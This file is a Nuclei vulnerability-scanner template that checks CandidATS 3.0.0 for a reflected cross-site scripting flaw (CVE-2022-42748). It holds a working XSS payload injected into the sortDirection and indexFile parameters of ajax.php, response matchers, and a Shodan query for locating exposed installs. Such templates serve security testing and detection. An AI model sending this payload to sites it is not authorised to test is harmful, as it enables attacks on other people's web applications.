nuclei-templates/http/cves/2022/CVE-2022-42748.yaml

54 lines
2.0 KiB
YAML

id: CVE-2022-42748
info:
name: CandidATS 3.0.0 - Cross-Site Scripting.
author: arafatansari
severity: medium
description: |
CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
reference:
- https://fluidattacks.com/advisories/modestep/
- https://fluidattacks.com/advisories/jcole/
- https://candidats.net/
- https://nvd.nist.gov/vuln/detail/CVE-2022-42748
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-42748
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40923
cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: auieo
product: candidats
shodan-query: http.html:"CandidATS"
tags: cve,cve2022,candidats,xss,auieo
http:
- method: GET
path:
- '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'candidat'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 404
# digest: 490a00463044022003499f24517b75cc02daf0115d61afa2db94cb0510670c6382eb6be3ebb0111b022075c69173cbc02c2e34e11c69c6dffc1cf0baa651d8a83ac5dac210966a2c61aa:922c64590222798bb761d5b6d8e72950